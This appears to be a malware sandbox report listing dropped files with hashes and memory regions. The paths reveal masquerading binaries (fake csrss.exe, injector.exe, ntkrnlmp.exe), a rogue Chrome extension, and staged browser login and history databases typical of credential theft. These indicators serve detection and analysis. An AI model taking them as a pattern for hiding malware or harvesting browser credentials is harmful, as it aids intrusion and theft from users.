C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d14c451344e5a1d715a747b384466894
SHA1 b959d8f9b0210826cbafe3f7a431680e818a51d4
SHA256 e8ac6ab24d8c4f4770f82c4e3328c99a9f6013a4048ba15bed68ffa42e063519
SHA512 3d58a358c01cabbee9581409c89a18322d0b894b6a863957e0e195cf06add80c05189ee86ed639074e3f04ca07166e8032d4ee07a8eb0b85fefc1d83fd744e1c

memory/2220-1018-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/1536-1029-0x0000000000D40000-0x0000000001AC3000-memory.dmp

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

\Windows\rss\csrss.exe

MD5 55a87651d3c0d209b72a185858107636
SHA1 b7b1e85c9be7db398888b9e60f853b83d493b31e
SHA256 270641bf5acce59ff39d9c75f06f8c9dbc0bd1ce81b6268fcae518ecc70b0e19
SHA512 703745e4b0c374fbed52d7e26fec90de7fcbf2a0892b9e916b2e9208c58100cedd8e9f0912c14fc08bc6f841593750cad30aa90a28057413445f7b3858568e5f

\Windows\rss\csrss.exe

MD5 111592899d04c8439a8b116841fa1af5
SHA1 843d8ff565cc72a4b24271dbe7b815502930776e
SHA256 c92c4737f3e32827e12ba6ae412a339868ba76f7da00de7ddf0f5e48e19b6735
SHA512 853d47b3fbddbb1f7fa08822765e7ab1a7e86db795a9b6db18138c8bd9317fccd36e1463fd4db504ae92feb1a1cd33050bea31b976c6aa4bac26295b6ef58674

C:\Windows\rss\csrss.exe

MD5 388b9f1ae46a681a3d5076f3292ab3f8
SHA1 7c6cef8c58e3cadf648e55e646f591283899adc3
SHA256 fba80de3f16a7dab80c6fba110634f71fce046ad2b73e1fe1a98d64ca652c368
SHA512 1903bc31dd4e48af8eb3318f47a2f904aaa5c13a91d389eeafa3bc8bcfad52cd84479f4e53fc9c3bb7330c7b4dfee03ff1bf5eab5ea806b319f27ad8ea052d0f

memory/452-1071-0x0000000004A90000-0x0000000004E88000-memory.dmp

memory/452-1072-0x0000000000400000-0x0000000003118000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 b4ce1d7f83a59c1c7caa5fa6459a8e3b
SHA1 90f0287b63d63e8eeca9d045a9369cc955c2d9fc
SHA256 88d2f8953de4adec36e5d83a7bbe36fbb43afb43c50a0341dae4239a10c8aa1d
SHA512 9a9d358e0eadfe2d7391d8d228c58906485732acba9671356174ca07a5260221bac0b4ba4bfb708c3fcce8a34b5e886f4e51f096fa99f13100479749871e4c5e

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 bdc08885fc53a990ea29f5167c1f5a8b
SHA1 b26b70961805617551473f1303566aedbd75bdf3
SHA256 8aa27f72fa142a8f4a106c64fc4d933d9260f5831a3e8f2cbd1d39bd2c510928
SHA512 64780d666e699c36c79c5014c0f6ff8db293e5de1058a5d192eece94e626fc500b1cecb6d9e097b394e04cfe41c66537aa6767b5acc1aad9092791375039584b

\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 e8f48a38f2870850759a80d8670440c1
SHA1 bd66ab9816a739f220f10511be2df49c2bf499bd
SHA256 590516d897c29fb1ac56dbe5f991af1b6ea1c1869dd12a7186257ee667983435
SHA512 34a03f70e7cd79bc54e32f7cd8d84d02816f2ebe127ade4767eb1d368e525d620d6982cdf8d58a1d8eaf6354da74b14b527fd4c2f56951b6da7edd934831a30a

\Users\Admin\AppData\Local\Temp\symsrv.dll

MD5 5c399d34d8dc01741269ff1f1aca7554
SHA1 e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256 e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA512 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

\Users\Admin\AppData\Local\Temp\dbghelp.dll

MD5 f0616fa8bc54ece07e3107057f74e4db
SHA1 b33995c4f9a004b7d806c4bb36040ee844781fca
SHA256 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026
SHA512 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 d0fab78e5be946230bc6344be5fb2d12
SHA1 db8d38be9964fae896674cec3c72f20e69ca9947
SHA256 ae818952a5abf42f76c0ee4c504e90b8b01d8c9a00d7ae0b1425ee34a64ff6b9
SHA512 38a69333c5bc12a06059226d40a0cf30f3c7d8f6576dd2b7069d431a6b03e3aa3d3b8122483d318dd43d7fabf80756bdb156bc7a2702f843e663c7f3b2022bde

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 0b5f899f2ca2ab3030784fe09201d882
SHA1 23083f00b60c4507f1818723d6dcb5fa9d7e9dfc
SHA256 f7596721e2175e4aab68914b2993d7c0cb97f8869a50931ba4455ef27f4fe089
SHA512 cfb93cba7f045bfdb72761fa956f68062cfaac315e562787018f33626c88477a0d4e4985f6bccdc9241e5b413ce316afeaf218214d1702e93f7aae1eb20976af

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 b41e025dafce740f4a5e794649d0b618
SHA1 c60e12e51466224add9121c0826c394d5d7e86f0
SHA256 6bbc1621f5bf9f145b3b34ffbfa6b042047f90138dbbfc535e7d56da6381bb73
SHA512 ae9615f391bc32fc2c08ec52949e6dc1045dc5c49c3f2281dfff2eee3879470d52a1c101d9183b324ab346127685b8f997ed70ea0404c05ba86827bce3f9b92d

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 f92c3fbf541b4d6314079039f989043d
SHA1 db897607f04adcf6dbbee29c1aa2326bcbbbef56
SHA256 61b4489f283ea8ed4bd4d13c52213ca4558afef5653e8e8a423fc96220fb7239
SHA512 aee43b48492078ce9370af53f84aa55720b5303650bb2fac549798db8ac9e7e628dc08246b7998c93a62f197d7151a94a5126f512c30b3f8d6e9595fb96328d7

\??\pipe\crashpad_1660_XKTEQPKBCSTPWMQW

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 d12b774d871a68121699a755b0213a85
SHA1 a8dc77401604b25abd1584e01f0c1a85dee8ed57
SHA256 7212d6856ef2c6c76002a6d8d912492d92d952b15a444cb1b6c37c5a8ebf4e3c
SHA512 9092a27197a28392114100c284882dbb3b00e42448460f0b245fb61ff5b6a0edd8bb7929b4aa007dd5dcd8e086651cb01f424f45105b4de643a48c2374954095

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\eciaojnpihmgkbacgpjnimcpkfeklgag\1.0.5_0\icons\button16_gray.png

MD5 063639790f82803cbabd87c1000419de
SHA1 def21db4dc72a4757190596e8abda4cdb19d5b27
SHA256 566950ec154716221f26c60e5381d4059d795c619fc775c442d8b3db5da89e5f
SHA512 b847e68b4d8aff592adf1ce9e5ed6435ad769f034b09c05f1f08b10de910a33f7175c95172d289c37280d618e871d7eb3d62f0aad9235a6498197e682489c5ac

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\eciaojnpihmgkbacgpjnimcpkfeklgag\1.0.5_0\icons\button16.png

MD5 88796de39efca78e02e56dc1bfc6952a
SHA1 d079a15866fc1b674b41cc7cb82e45f098b35c43
SHA256 effdea56479505371c47eec59fe23280e039a5aeaa2a481b5407d3c36723338f
SHA512 8a888047f62069780cc8b0e76ed93cd83476796adf097493a28e8b48902476b3d97e5dbc301d20cf9a691df73c7ec611f0f39a27a3a9c20e1091940c7f4bdd6a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\eciaojnpihmgkbacgpjnimcpkfeklgag\1.0.5_0\content-script.js

MD5 fc473ab01e941ae72f65b02160f87ef4
SHA1 26bb53953a6e60d5ebc4a58bb811a3ffac5335f8
SHA256 ddf4f9a5a4ec06a6473287e83de5dbb19d5d4370a72ca0c2dfbbee3775c1fbf8
SHA512 148f1568995b455c5eb2685bb05cf719c031e358863cc7e359f73f4114db934d3b615212cae8abc41c710a40f917597af15fff1672fd0e0955a0b03ab1424653

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\eciaojnpihmgkbacgpjnimcpkfeklgag\1.0.5_0\_metadata\verified_contents.json

MD5 f7f0462b05d4eea341c565ccd96a8b63
SHA1 15ed215063cfec11b5ab937258ebe2617295e651
SHA256 40a0de2bcceb97b08a8804ffd7d348dac07e15bce3d042fe2c7a315ea656f73f
SHA512 bd905485f5963c737ef26ac05118e4a32a85365cbfc05d7cb465644e321a3930e0458a8e5801e7572cc3456fbcf836750db7dc6a088ff2f4fb4d1a08be551abe

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

MD5 18e723571b00fb1694a3bad6c78e4054
SHA1 afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA256 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA512 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\CURRENT~RFf76c3db.TMP

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\eciaojnpihmgkbacgpjnimcpkfeklgag\000002.dbtmp

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 fd17e12e33af88ada75312d7a40e0dfd
SHA1 ad721ed218f551ea6225dfa03142bf56f48d7083
SHA256 2e2ba51bc4b372790b3c89641e016ba2976685bc7eae6678c7b582a991611a5a
SHA512 763f3b302c4de32101b9e9f16bca286c7a308109cd51cfa089221f17a6de1db8c3d4a2221506a0d103bf8700a2dcd5fb47e976334426bad4353909cbc38558f9

C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\D87fZN3R3jFeWeb Data

MD5 18e04095708297d6889a6962f81e8d8f
SHA1 9a25645db1da0217092c06579599b04982192124
SHA256 4ed16c019fe50bb4ab1c9dcedf0e52f93454b5dbaf18615d60761e7927b69fb7
SHA512 45ec57bddeeb8bca05babcf8da83bf9db630819b23076a1cf79f2e54b3e88e14cd7db650332554026ab5e8634061dd699f322bcba6683765063e67ac47ea1caf

C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\8ghN89CsjOW1Login Data For Account

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\3b6N2Xdh3CYwplaces.sqlite

MD5 5abefffbcfcb833e098dff88ca9c2cf2
SHA1 00c13b1547bf540e7106742f45e6d55f01e8dcf0
SHA256 679c618e9cb42323cd0be32e9a9a55649e1700efa0a862a0d4a05b78e4dffdb6
SHA512 3404324afa33be247f6b402703ce2f45af174e6faaff2aaa35b6b01b77b5fcc68454acc61399bc197fa4e3942e0d044f7ecaaa73aa7403d1bc2fea04bdad201a

C:\Users\Admin\AppData\Local\Temp\adobe_K9P2oRtBlnq\information.txt

MD5 cf04337e11f83710bc8466692919e38f
SHA1 b73931770c927b7c5d907252e6aaf1905fede0e5
SHA256 b146f7c043ab96694608b826d4efe41f1cbadae647a156538c146fe32de7b5da
SHA512 19ac53b91f2a5ca68cb80ea1ef6c4be516f29558f1d4646f71f4a77144e8c181d038cc26e38c22874a4f7e67befd6156d0162d651ce6d523a44d75b3e89f4f71

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\ProJgWWzBHWXbAm\XOmGTSn.exe

MD5 3d2fd432d83034d3f60f4353943ba959
SHA1 aaa51821a12eec15e704c4a1827ae3cdc401ad92
SHA256 7ee27efcbf77620cb30881e9360937d55e4d76e5963d94f898d818a1cac5ae06
SHA512 a1b923df19ef86ce6d961b1b41222bbb54aee18a2c2ccb61c7a617091f1a4ba51b3fef46315455ec89c0ded917adb18f76f1815d53fb7a766434f7660e81ac1a

C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\KNhryoa8p5U1x6qRHgW5.exe

MD5 ccba907ff137d72e46c20fa3d523c777
SHA1 fbef73ed53f836d4a6f3619b7033237c9a88bebb
SHA256 3cf41c34268b626c913a0db4317871eac685cfac493d3b7a641315d67bb5acf4
SHA512 037df2c6628026451df2e20346c8009b1a1ff77bb3e915b509c86b94d3e70dd6a8bf98607acba1c123abb99e36781eafadc1b7f6d7e82830c7f7ffd2558a7e19

memory/708-1350-0x00000000737C0000-0x0000000073EAE000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA

MD5 747ef608e6ecc1ea01054099357c5993
SHA1 daa0d8b324afd5e7c33ce9dc72006f5247d63281
SHA256 4f0cf780e5037f6ad8a3ba213315302501203dca03f8ab28f56c67dbc8b40ed9
SHA512 858b757b7032181012cd9a945e53d1274a68b01d2f260a64616b355ec9cf7bc13ce1a629be4e952d42a6e44f48ffcacbc6a3a2ca0ddd9c4e4d042a744f43c7ef

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2b8c4d6e9733c38f34eb72ce17bc8236
SHA1 4904f60367d53607c6938aa4b2042fb06a5f718f
SHA256 9e8588c5897282c21c172b23b717b3f2bb705d24552d167cc9dffa2615a839ea
SHA512 e7f42bc47bdc1e3b8bfd4dcbf2516e2ec1da56ab3eaa3b7de9b99a21d7377c8f1719fb69ef4a668dd93d025cdcbb0483debbfa3f451a10c5df0935e8b5f6cff5

memory/1872-1431-0x0000000000990000-0x0000000000991000-memory.dmp

memory/2220-1436-0x0000000002F25000-0x0000000002F3D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2BF.exe

MD5 b12a32d3450c2cd7aae7f9af384b4cac
SHA1 973641854c881465136f275283c9642f8bad62d5
SHA256 388ef1a3c7b241d0583503e836918a2a316d8e4a733fed3ab39c838d73cf91b4
SHA512 fc6510b724f6af1994c3ef8549dd178a2e986c816a88d4ee6f7ff0d2bb94e3f3b144e547994635a764b43f0127e8bb11dbcd00d26aad6d12a6378626bc2f77c3

memory/2220-1448-0x0000000000400000-0x0000000002D38000-memory.dmp

memory/1872-1454-0x0000000000CD0000-0x000000000126B000-memory.dmp

memory/3684-1463-0x00000000046F0000-0x00000000048A8000-memory.dmp

memory/3684-1465-0x00000000048B0000-0x0000000004A67000-memory.dmp

memory/1872-1464-0x0000000002A60000-0x0000000002A61000-memory.dmp

memory/1872-1475-0x0000000002BE0000-0x0000000002BE1000-memory.dmp

memory/1872-1480-0x00000000026C0000-0x00000000026C1000-memory.dmp

memory/1872-1485-0x0000000002BF0000-0x0000000002BF1000-memory.dmp

memory/1872-1484-0x0000000002C00000-0x0000000002C02000-memory.dmp

memory/1872-1481-0x0000000000980000-0x0000000000982000-memory.dmp

memory/1872-1479-0x0000000002B90000-0x0000000002B91000-memory.dmp

memory/1872-1478-0x0000000002A80000-0x0000000002A81000-memory.dmp

memory/1872-1474-0x0000000002910000-0x0000000002911000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 63e438954d654f3546d0f463cd305b6d
SHA1 76cc4b7b51d42ef38201b9cfd88629cbe6447579
SHA256 2b620be240c3c5f0a3fa8762352975392be2a83f3e08e63a55ad41775cb0bade
SHA512 b92dc9ae54097bde1d2162ffdf2c129c0ab778293e72a07429a3220af224244d9db65dda20ab8a1c0e534e9d478c30b41d2004fbbbb651e9617ac787b6ef41b8

memory/2324-1576-0x000007FEF2640000-0x000007FEF2FDD000-memory.dmp

memory/2324-1577-0x0000000002F20000-0x0000000002FA0000-memory.dmp

memory/2788-1579-0x0000000004CB0000-0x00000000050A8000-memory.dmp

memory/1828-1578-0x00000000002E0000-0x00000000002E1000-memory.dmp

memory/2352-1580-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CY2G78MW\3m4lyvbs6efg8pyhv7kupo6dh[1].ico

MD5 3d0e5c05903cec0bc8e3fe0cda552745
SHA1 1b513503c65572f0787a14cc71018bd34f11b661
SHA256 42a498dc5f62d81801f8e753fc9a50af5bc1aabda8ab8b2960dce48211d7c023
SHA512 3d95663ac130116961f53cdca380ffc34e4814c52f801df59629ec999db79661b1d1f8b2e35d90f1a5f68ce22cc07e03f8069bd6e593c7614f7a8b0b0c09fa9e

memory/2788-1595-0x0000000000400000-0x0000000003118000-memory.dmp

memory/1384-1596-0x0000000000550000-0x0000000000B38000-memory.dmp

memory/1384-1597-0x0000000000760000-0x0000000000D48000-memory.dmp

memory/1872-1598-0x00000000026D0000-0x00000000026D1000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\6ef95c0c-c5eb-477e-a91d-9cde8a286652.tmp

MD5 296ec7e1734c2f224204c949ccd335d2
SHA1 3294e35c80af3c892767512cbaa7736460c28952
SHA256 d8c4c69cfb9e4cd0b2878dc2a48cc72d54cf73e8f64a4d3c0ad66a109a6abe0f
SHA512 80ac4f585371bfee01f81673b5d40d6be19fb2264449222aef2dad6a2c72ffd02824492851cd81c0fdde44d03edc4c150c8800ad7b70eed5e2855f6f7ef56e15

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 7b7b64e21cc3c8295ade9914b4140ded
SHA1 6a96c39af69268d25c60aeeedb15d1e100de6119
SHA256 1afa729189008fae921e27e07cf92b2d87b22558e93684141092ec98c3a62c90
SHA512 2890019a01665020f9c28a799d0a2f7bd35c0798120598bbdb01d4bf63a4a323abb04d576cb46436d8fe491b719c2e4ae574ac0d74be2f43a07b0d32dcc36e55

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 fafbf2197151d5ce947872a4b0bcbe16
SHA1 a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020
SHA256 feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71
SHA512 acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\svXurge7NCIUBVHrYG75.exe

MD5 9167418153667b5984b64729e2cc304c
SHA1 af391e07bdd8592a06fa13077f2fdeb6a564bdc0
SHA256 b59d22ae79f79061d50ee7461c9e146bb4df6a048ec9deebd267944237206961
SHA512 1909ff300fbb006fdedf87729791909d75225ef68a62fd5dcb8a0d525b8102cedd4ec86a8b268aaf10e577e6d525928539b1668acb2758d8d0a93f16480e76f4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_520FA7AD0A5B7A5300910F5BBDCB6D0C

MD5 512484c864f03d942b375be914f0e87a
SHA1 22d5f6f2a2f75c2824ebe531bb4469820f4e412f
SHA256 7007095b23b512a2d22c0c3464521d4c04a216bb1adfd2d710d1b1325e44563e
SHA512 fbd34a47c65ed8781073c404dac037be619fc057e8fd9c41d5fe2173241188ceef6d3fb1422406ffa0665dd33f2465cc5ea7bd9f6d61f2974df452dca9bf2a11

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\O4ZUVKGE\accounts.google[1].xml

MD5 c1ddea3ef6bbef3e7060a1a9ad89e4c5
SHA1 35e3224fcbd3e1af306f2b6a2c6bbea9b0867966
SHA256 b71e4d17274636b97179ba2d97c742735b6510eb54f22893d3a2daff2ceb28db
SHA512 6be8cec7c862afae5b37aa32dc5bb45912881a3276606da41bf808a4ef92c318b355e616bf45a257b995520d72b7c08752c0be445dceade5cf79f73480910fed

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\30BCF8D79B1225AC4F40686E58D30D95

MD5 3a9e9078c23e745b6b3adeda8bf007d6
SHA1 73efef6de1ae81ad90f1f313aec7a51b6a793d99
SHA256 a5719da1dcac5ffae8d52cbeb79fa95e4da62746c111eeb833250a5e04a6f328
SHA512 a52b200ca23fc077b9870b03aadb0845012a0206a8243b00d040e1f407941a3952b0671b31c97e5f733c9a19df2b79f733235d9d48b35382e6e06414fa6d4c72

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\30BCF8D79B1225AC4F40686E58D30D95

MD5 f40ed113228750cfd7a589e9d717c518
SHA1 14a57aadde10d2d7d8ca590a6c1fb04886897693
SHA256 94615d8606f3e16679d03700a02ced8b7ea8c2b453da9b7bea855cbe229d395a
SHA512 a20e48dd8b432da446be22a6f675574fab2f321ce11690fe75312795a62dd832c4652633d8547c6eee1743687f706ba0a464f56239c09882c8af171fd3869bbd

C:\Users\Admin\AppData\Local\Temp\Kno226F.tmp

MD5 002d5646771d31d1e7c57990cc020150
SHA1 a28ec731f9106c252f313cca349a68ef94ee3de9
SHA256 1e2e25bf730ff20c89d57aa38f7f34be7690820e8279b20127d0014dd27b743f
SHA512 689e90e7d83eef054a168b98ba2b8d05ab6ff8564e199d4089215ad3fe33440908e687aa9ad7d94468f9f57a4cc19842d53a9cd2f17758bdadf0503df63629c6

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\jw2rl61\imagestore.dat

MD5 04ea2732aeca95131a59c207c8426617
SHA1 facee4d396551c97c1fb53925902f8d7a97a283a
SHA256 c99d2ddd041314957c575a9be8fb544b1bb821e0222dbd2728488a1d52cec31f
SHA512 6bab4e91326ce9a1eb1e26dcf675553c74d2b1de0fd953148c4fb330e72a24ce63bd99aab2fa9000052beab28d6f8bbbb641970514668e2ac9da3b8f59d68cc1

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RSAB58HZ\favicon[1].ico

MD5 f3418a443e7d841097c714d69ec4bcb8
SHA1 49263695f6b0cdd72f45cf1b775e660fdc36c606
SHA256 6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770
SHA512 82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563

C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico

MD5 da597791be3b6e732f0bc8b20e38ee62
SHA1 1125c45d285c360542027d7554a5c442288974de
SHA256 5b2c34b3c4e8dd898b664dba6c3786e2ff9869eff55d673aa48361f11325ed07
SHA512 d8dc8358727590a1ed74dc70356aedc0499552c2dc0cd4f7a01853dd85ceb3aead5fbdc7c75d7da36db6af2448ce5abdff64cebdca3533ecad953c061a9b338e

C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdesc-consensus.tmp

MD5 b3ac3cbe864fd6a9b834580173b47cd5
SHA1 9efaf52ea87825877a4e9cf4bf6e0f75436f8632
SHA256 42948b3d788a51acbfc4b588027b2ad4e97f150f772c576fc99f51b852a6b476
SHA512 4a8ea2d1ea425227765600438db8485a484ffd6781b636c67662babe0d709f67e1b6cf7c576e749e188646338769ec9adb3ddf96ff5282021adf9a2c412cdd3c

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\4Kv5U5b1o3f[1].png

MD5 a81a5e7f71ae4153e6f888f1c92e5e11
SHA1 39c3945c30abff65b372a7d8c691178ae9d9eee0
SHA256 2bc7a47889c56ad49f1b8b97385d5a4d212e79bb8a9b30df0665a165f58b273e
SHA512 1df32349b33f6a6fcb1f8b6093abd737fa0638cdd6e3fd90a7e1852bd0e40bc2633cb4e13c4824fb948d1e012e5cb9eed0b038b121404865495d4e57e123db69

C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdescs.new

MD5 1f6dc80ce5a84ef17e9779794b7df6e8
SHA1 5bb4d57eceb0088339010522d0085923b994a2f4
SHA256 403b6799de69adfc12508f5076adebb0bd3d8a61104550b1bcbd339ca63b8df2
SHA512 5adfaf13c99bd71ebca26e4f3da9ec03587be69bfe3b7487817640e3259b2b354f96786370e8419577ef5eb6a3a12c623345c98f8969e43cd8f0496d1b437d23

C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\caYoou6AkD688ohBorlb.exe

MD5 6521303e3666ae8ed8da817141810cc1
SHA1 7369d9bb8d156ea2a6ee134b7cd547913309806b
SHA256 7595acad6784cd13d6bd3fa41bf3087d66313ca9be5e1eab48f429c81ce5c2f1
SHA512 f4b58df7e5718053558fb848e0ae4d4a43468b71d929e4a856620170589cc9f55ffda257db2869fe2e7603d51a87516840654a96bfb84d2630188cd9c608d94d

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

MD5 92f9cb175991f582b8dfd0c5e3996110
SHA1 062df1e5e55706f4a99ab275a0e5ffc227356296
SHA256 7192a1241a20e08be3b1746bb93b5e2638e1beb748736c4d30c12d6b7d47a287
SHA512 4637a6faba71dd4a2f69c9acb77a64665e748d17d6933b7dd1be3db2eb862adc08a34415651ae0f93c37ad110322c0cb89f304f8310f704ef344b916ceb8b554

C:\Users\Admin\AppData\Local\Temp\CF74.exe

MD5 fa8e35d22c98e53b6366ebaeec28b6b6
SHA1 088e3ad63c39188ff30f8a3c2541293aa1d06df6
SHA256 2d68f91830a905f55f61d37e69cf925fb85396aa6fa4f5083e117f80a26efd57
